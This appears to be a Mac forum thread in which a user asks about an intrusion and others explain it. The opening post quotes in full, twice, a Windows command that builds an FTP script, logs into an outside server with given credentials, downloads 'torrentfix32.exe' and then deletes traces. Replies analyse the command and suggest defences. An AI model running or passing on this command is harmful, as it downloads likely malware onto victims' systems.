Hacker on board
It appears that I've got someone trying to access my home system.
The hacker was able to change a file name on my desktop. I found this hacker while using Firefox. The hacker was trying to search via Firefox search for:
cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get torrentfix32.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7torrentfix32.exe 7exit
This is also what the hacker renamed my existing file to on my desktop.
What type of program was this person trying to run?
Aphyd
The hacker was able to change a file name on my desktop. I found this hacker while using Firefox. The hacker was trying to search via Firefox search for:
cmd /c echo open ftp1.killyourself.info 21 .. ik 7echo user mysql database .. ik 7echo binary .. ik 7echo get torrentfix32.exe .. ik 7echo bye .. ik 7ftp -n -v -s;ik 7del ik 7torrentfix32.exe 7exit
This is also what the hacker renamed my existing file to on my desktop.
What type of program was this person trying to run?
Aphyd
Comments
Looks like a Windows hacker. He didn't really do anything. You're not running a Windows computer are you? If you are, you need to run antivirus. I recommend Avast! Antivirus. It's slim on resources and free.
Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.
http://www.macfixitforums.com/showfl...99&Search=true
The command he tried to execute mounts an ftp server at ftp1.killyourself.info. You can mount this yourself via a browser or the Finder with the username mysql and password database. It then copies the file torrentfix32.exe over. I don't know if that is some trojan that allows more access to the system or is just a virus. Suffice to say it's a Windows executable and the command he tried to run would only work correctly on Windows.
As mentioned in the above links, check to see if you have an insecure IRC client or VNC server or something - that's possibly how he was able to save/rename a file.
Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.
But this happened on your Mac while you were running Windows? Did you boot into Windows with Boot Camp, were you running Windows with Parallels?
Not running a Windows box. I tracked his IP address to Malaysia. Tough to pursue this guy if I wanted to.
Malaysia has a boatload of open anonymous proxies. So the IP means nothing - he could even be down the street from you. Do you have any script kiddie friends or neighbors who have been ranting at you about Macs not being "invulnerable?"